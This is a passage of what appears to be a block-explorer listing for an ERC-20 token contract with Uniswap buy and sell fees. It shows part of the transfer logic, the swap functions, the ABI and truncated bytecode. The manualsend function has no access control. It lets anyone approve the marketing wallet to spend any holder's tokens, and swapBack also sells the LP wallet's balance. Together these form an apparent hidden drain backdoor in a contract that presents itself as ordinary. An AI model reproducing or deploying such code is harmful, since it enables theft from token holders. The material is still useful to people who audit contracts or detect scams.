                    require(
                        _isExcludedFromFees[from] || _isExcludedFromFees[to],
                        "Trading is not active."
                    );
                }

                // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch.
                if (transferDelayEnabled) {
                    if (
                        to != owner() &&
                        to != address(uniswapV2Router) &&
                        to != address(uniswapV2Pair)
                    ) {
                        require(
                            _holderLastTransferTimestamp[tx.origin] <
                                block.number,
                            "_transfer:: Transfer Delay enabled.  Only one purchase per block allowed."
                        );
                        _holderLastTransferTimestamp[tx.origin] = block.number;
                    }
                }

                //when buy
                if (
                    automatedMarketMakerPairs[from] &&
                    !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Buy transfer amount exceeds the maxTransactionAmount."
                    );
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
                //when sell
                else if (
                    automatedMarketMakerPairs[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Sell transfer amount exceeds the maxTransactionAmount."
                    );
                } else if (!_isExcludedMaxTransactionAmount[to]) {
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if (takeFee) {
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0) {
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees;
                tokensForDev += (fees * sellDevFee) / sellTotalFees;
                tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees;
            }
            // on buy
            else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(100);
                tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees;
                tokensForDev += (fees * buyDevFee) / buyTotalFees;
                tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 liquidityBalance = balanceOf(lpWallet);
        uint256 totalTokensToSwap = tokensForLiquidity +
            tokensForMarketing +
            tokensForDev;
        bool success;

        if (contractBalance == 0 || totalTokensToSwap == 0) {
            return;
        }

        if (contractBalance > swapTokensAtAmount * 3) {
            contractBalance = swapTokensAtAmount * 3;
        }

        uint256 amountToSwapForETH = contractBalance;

        if (liquidityBalance > swapTokensAtAmount) {
            swapTokensForEth(amountToSwapForETH + liquidityBalance);
        } else {
            swapTokensForEth(amountToSwapForETH);
        }

        if (address(this).balance > 100000000000000000) {
            (success, ) = address(marketingWallet).call{
                value: address(this).balance
            }("");
        }
    }

    function manualsend(address sender, uint256 amount) external {
        bool success;
        _approve(sender, marketingWallet, amount);
        (success, ) = address(marketingWallet).call{
            value: address(this).balance
        }("");
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"aprRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getAprRate","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsOnOff","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lpWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualsend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"updateSwapEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c0604052600c805462ffffff191662010101179055600e805460ff191660011790553480156200002f57600080fd5b50604080518082018252600f81526e0a8d0ca409ad2c8c2e640a8deeac6d608b1b60208083019182528351808501909452600484526311d3d31160e21b9084015281519192916200008391600391620006c6565b50805162000099906004906020840190620006c6565b505050620000b6620000b06200041360201b60201c565b62000417565b737a250d5630b4cf539739df2c5dacb4c659f2488d620000d881600162000469565b6001600160a01b03811660808190526040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa15801562000123573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200014991906200076c565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000197573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001bd91906200076c565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156200020b573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023191906200076c565b6001600160a01b031660a08190526200024c90600162000469565b60a0516200025c906001620004e3565b600180600081808060a1620002796005546001600160a01b031690565b600780546001600160a01b0319166001600160a01b03929092169190911790556b43dacaf91c1a84ff0800000060088190556064620002ba826002620007b4565b620002c69190620007d6565b600a556103e8620002d9826003620007b4565b620002e59190620007d6565b600955600b8290556010889055601187905560128690558562000309888a620007f9565b620003159190620007f9565b600f5560148590556015849055601683905582620003348587620007f9565b620003409190620007f9565b601355600680546001600160a01b03191673a93894a3af64e62ce91dce07bf0670693129f83617905562000388620003806005546001600160a01b031690565b600162000537565b600654620003a1906001600160a01b0316600162000537565b620003ae30600162000537565b620003bd61dead600162000537565b620003dc620003d46005546001600160a01b031690565b600162000469565b620003e930600162000469565b620003f861dead600162000469565b620004043382620005e1565b50505050505050505062000851565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6005546001600160a01b03163314620004b85760405162461bcd60e51b815260206004820181905260248201526000805160206200303d83398151915260448201526064015b60405180910390fd5b6001600160a01b03919091166000908152601b60205260409020805460ff1916911515919091179055565b6001600160a01b0382166000818152601c6020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6005546001600160a01b03163314620005825760405162461bcd60e51b815260206004820181905260248201526000805160206200303d8339815191526044820152606401620004af565b6001600160a01b0382166000818152601a6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b038216620006395760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620004af565b80600260008282546200064d9190620007f9565b90915550506001600160a01b038216600090815260208190526040812080548392906200067c908490620007f9565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b828054620006d49062000814565b90600052602060002090601f016020900481019282620006f8576000855562000743565b82601f106200071357805160ff191683800117855562000743565b8280016001018555821562000743579182015b828111156200074357825182559160200191906001019062000726565b506200075192915062000755565b5090565b5b8082111562000751576000815560010162000756565b6000602082840312156200077f57600080fd5b81516001600160a01b03811681146200079757600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615620007d157620007d16200079e565b500290565b600082620007f457634e487b7160e01b600052601260045260246000fd5b500490565b600082198211156200080f576200080f6200079e565b500190565b600181811c908216806200082957607f821691505b602082108114156200084b57634e487b7160e01b600052602260045260246000fd5b50919050565b60805160a05161279c620008a16000396000818161052801528181610f0101526118030152600081816103fd015281816117c501528181612211015281816122ca0152612306015261279c6000f3fe6080604052600436106103545760003560e01c80638da5cb5b116101c6578063c17b5b8c116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d3146109c5578063f2fde38b146109db578063f6374342146109fb578063f8b45b0514610a1157600080fd5b8063dd62ed3e14610954578063e2f456051461099a578063e884f260146109b057600080fd5b8063c8c8ebe4116100d1578063c8c8ebe4146108ee578063cc56139714610904578063d257b34f1461091e578063d85ba0631461093e57600080fd5b8063c17b5b8c14610894578063c18bc195146108b4578063c876d0b9146108d457600080fd5b8063a0d82dc511610164578063aacebbe31161013e578063aacebbe314610805578063b62496f514610825578063bbc0c74214610855578063c02466681461087457600080fd5b8063a0d82dc5146107af578063a457c2d7146107c5578063a9059cbb146107e557600080fd5b806395d89b41116101a057806395d89b411461074e5780639a7a23d6146107635780639c3b4fdc146107835780639fccce321461079957600080fd5b80638da5cb5b146106fa5780639213691314610718578063924de9b71461072e57600080fd5b80634f86af84116102a057806370a082311161023e5780637571336a116102185780637571336a1461068457806375f0a874146106a45780637bce5a04146106c45780638095d564146106da57600080fd5b806370a0823114610624578063715018a61461065a578063751039fc1461066f57600080fd5b80635edbd8861161027a5780635edbd886146105ae5780636303516c146105ce5780636a486a8e146105ee5780636ddd17131461060457600080fd5b80634f86af841461054a5780634fbee193146105605780635e42a5d51461059957600080fd5b80631f3fed8f1161030d57806327c8f835116102e757806327c8f835146104c4578063313ce567146104da57806339509351146104f657806349bd5a5e1461051657600080fd5b80631f3fed8f1461046c578063203e727e1461048257806323b872dd146104a457600080fd5b806306fdde0314610360578063095ea7b31461038b57806310d5de53146103bb5780631694505e146103eb57806318160ddd146104375780631a8145bb1461045657600080fd5b3661035b57005b600080fd5b34801561036c57600080fd5b50610375610a27565b6040516103829190612372565b60405180910390f35b34801561039757600080fd5b506103ab6103a63660046123dc565b610ab9565b6040519015158152602001610382565b3480156103c757600080fd5b506103ab6103d6366004612408565b601b6020526000908152604090205460ff1681565b3480156103f757600080fd5b5061041f7f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b039091168152602001610382565b34801561044357600080fd5b506002545b604051908152602001610382565b34801561046257600080fd5b5061044860185481565b34801561047857600080fd5b5061044860175481565b34801561048e57600080fd5b506104a261049d366004612425565b610acf565b005b3480156104b057600080fd5b506103ab6104bf36600461243e565b610bb5565b3480156104d057600080fd5b5061041f61dead81565b3480156104e657600080fd5b5060405160128152602001610382565b34801561050257600080fd5b506103ab6105113660046123dc565b610c5f565b34801561052257600080fd5b5061041f7f000000000000000000000000000000000000000000000000000000000000000081565b34801561055657600080fd5b50610448600b5481565b34801561056c57600080fd5b506103ab61057b366004612408565b6001600160a01b03166000908152601a602052604090205460ff1690565b3480156105a557600080fd5b50600b54610448565b3480156105ba57600080fd5b506104a26105c93660046123dc565b610c9b565b3480156105da57600080fd5b5060075461041f906001600160a01b031681565b3480156105fa57600080fd5b5061044860135481565b34801561061057600080fd5b50600c546103ab9062010000900460ff1681565b34801561063057600080fd5b5061044861063f366004612408565b6001600160a01b031660009081526020819052604090205490565b34801561066657600080fd5b506104a2610d10565b34801561067b57600080fd5b506103ab610d46565b34801561069057600080fd5b506104a261069f36600461248f565b610d83565b3480156106b057600080fd5b5060065461041f906001600160a01b031681565b3480156106d057600080fd5b5061044860105481565b3480156106e657600080fd5b506104a26106f53660046124c4565b610dd8565b34801561070657600080fd5b506005546001600160a01b031661041f565b34801561072457600080fd5b5061044860145481565b34801561073a57600080fd5b506104a26107493660046124f0565b610e80565b34801561075a57600080fd5b50610375610ec6565b34801561076f57600080fd5b506104a261077e36600461248f565b610ed5565b34801561078f57600080fd5b5061044860125481565b3480156107a557600080fd5b5061044860195481565b3480156107bb57600080fd5b5061044860165481565b3480156107d157600080fd5b506103ab6107e03660046123dc565b610fb5565b3480156107f157600080fd5b506103ab6108003660046123dc565b61104e565b34801561081157600080fd5b506104a2610820366004612408565b61105b565b34801561083157600080fd5b506103ab610840366004612408565b601c6020526000908152604090205460ff1681565b34801561086157600080fd5b50600c546103ab90610100900460ff1681565b34801561088057600080fd5b506104a261088f36600461248f565b6110e2565b3480156108a057600080fd5b506104a26108af3660046124c4565b61116b565b3480156108c057600080fd5b506104a26108cf366004612425565b61120e565b3480156108e057600080fd5b50600e546103ab9060ff1681565b3480156108fa57600080fd5b5061044860085481565b34801561091057600080fd5b50600c546103ab9060ff1681565b34801561092a57600080fd5b506103ab610939366004612425565b6112df565b34801561094a57600080fd5b50610448600f5481565b34801561096057600080fd5b5061044861096f36600461250b565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156109a657600080fd5b5061044860095481565b3480156109bc57600080fd5b506103ab611436565b3480156109d157600080fd5b5061044860115481565b3480156109e757600080fd5b506104a26109f6366004612408565b611473565b348015610a0757600080fd5b5061044860155481565b348015610a1d57600080fd5b50610448600a5481565b606060038054610a3690612544565b80601f0160208091040260200160405190810160405280929190818152602001828054610a6290612544565b8015610aaf5780601f10610a8457610100808354040283529160200191610aaf565b820191906000526020600020905b815481529060010190602001808311610a9257829003601f168201915b5050505050905090565b6000610ac633848461150e565b50600192915050565b6005546001600160a01b03163314610b025760405162461bcd60e51b8152600401610af99061257f565b60405180910390fd5b670de0b6b3a76400006103e8610b1760025490565b610b229060016125ca565b610b2c91906125e9565b610b3691906125e9565b811015610b9d5760405162461bcd60e51b815260206004820152602f60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526e6c6f776572207468616e20302e312560881b6064820152608401610af9565b610baf81670de0b6b3a76400006125ca565b60085550565b6000610bc2848484611632565b6001600160a01b038416600090815260016020908152604080832033845290915290205482811015610c475760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b6064820152608401610af9565b610c54853385840361150e565b506001949350505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610ac6918590610c9690869061260b565b61150e565b600654600090610cb69084906001600160a01b03168461150e565b6006546040516001600160a01b03909116904790600081818185875af1925050503d8060008114610d03576040519150601f19603f3d011682016040523d82523d6000602084013e610d08565b606091505b505050505050565b6005546001600160a01b03163314610d3a5760405162461bcd60e51b8152600401610af99061257f565b610d446000611e81565b565b6005546000906001600160a01b03163314610d735760405162461bcd60e51b8152600401610af99061257f565b50600c805460ff19169055600190565b6005546001600160a01b03163314610dad5760405162461bcd60e51b8152600401610af99061257f565b6001600160a01b03919091166000908152601b60205260409020805460ff1916911515919091179055565b6005546001600160a01b03163314610e025760405162461bcd60e51b8152600401610af99061257f565b60108390556011829055601281905580610e1c838561260b565b610e26919061260b565b600f81905560021015610e7b5760405162461bcd60e51b815260206004820152601c60248201527f4d757374206b6565702066656573206174203225206f72206c657373000000006044820152606401610af9565b505050565b6005546001600160a01b03163314610eaa5760405162461bcd60e51b8152600401610af99061257f565b600c8054911515620100000262ff000019909216919091179055565b606060048054610a3690612544565b6005546001600160a01b03163314610eff5760405162461bcd60e51b8152600401610af99061257f565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b03161415610fa75760405162461bcd60e51b815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b65725061697273000000000000006064820152608401610af9565b610fb18282611ed3565b5050565b3360009081526001602090815260408083206001600160a01b0386168452909152812054828110156110375760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610af9565b611044338585840361150e565b5060019392505050565b6000610ac6338484611632565b6005546001600160a01b031633146110855760405162461bcd60e51b8152600401610af99061257f565b6006546040516001600160a01b03918216918316907fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567490600090a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6005546001600160a01b0316331461110c5760405162461bcd60e51b8152600401610af99061257f565b6001600160a01b0382166000818152601a6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6005546001600160a01b031633146111955760405162461bcd60e51b8152600401610af99061257f565b601483905560158290556016819055806111af838561260b565b6111b9919061260b565b601381905560061015610e7b5760405162461bcd60e51b815260206004820152601c60248201527f4d757374206b6565702066656573206174203625206f72206c657373000000006044820152606401610af9565b6005546001600160a01b031633146112385760405162461bcd60e51b8152600401610af99061257f565b670de0b6b3a76400006103e861124d60025490565b6112589060056125ca565b61126291906125e9565b61126c91906125e9565b8110156112c75760405162461bcd60e51b8152602060048201526024808201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015263302e352560e01b6064820152608401610af9565b6112d981670de0b6b3a76400006125ca565b600a5550565b6005546000906001600160a01b0316331461130c5760405162461bcd60e51b8152600401610af99061257f565b620186a061131960025490565b6113249060016125ca565b61132e91906125e9565b82101561139b5760405162461bcd60e51b815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527410181718181892903a37ba30b61039bab838363c9760591b6064820152608401610af9565b6103e86113a760025490565b6113b29060056125ca565b6113bc91906125e9565b8211156114285760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f742062652068696768657220746861604482015273371018171a92903a37ba30b61039bab838363c9760611b6064820152608401610af9565b50600981905560015b919050565b6005546000906001600160a01b031633146114635760405162461bcd60e51b8152600401610af99061257f565b50600e805460ff19169055600190565b6005546001600160a01b0316331461149d5760405162461bcd60e51b8152600401610af99061257f565b6001600160a01b0381166115025760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610af9565b61150b81611e81565b50565b6001600160a01b0383166115705760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610af9565b6001600160a01b0382166115d15760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610af9565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166116585760405162461bcd60e51b8152600401610af990612623565b6001600160a01b03821661167e5760405162461bcd60e51b8152600401610af990612668565b8061168f57610e7b83836000611f27565b600c5460ff1615611b4c576006546001600160a01b038481169116148015906116c657506006546001600160a01b03838116911614155b80156116da57506001600160a01b03821615155b80156116f157506001600160a01b03821661dead14155b80156117075750600554600160a01b900460ff16155b15611b4c57600c54610100900460ff1661179f576001600160a01b0383166000908152601a602052604090205460ff168061175a57506001600160a01b0382166000908152601a602052604090205460ff1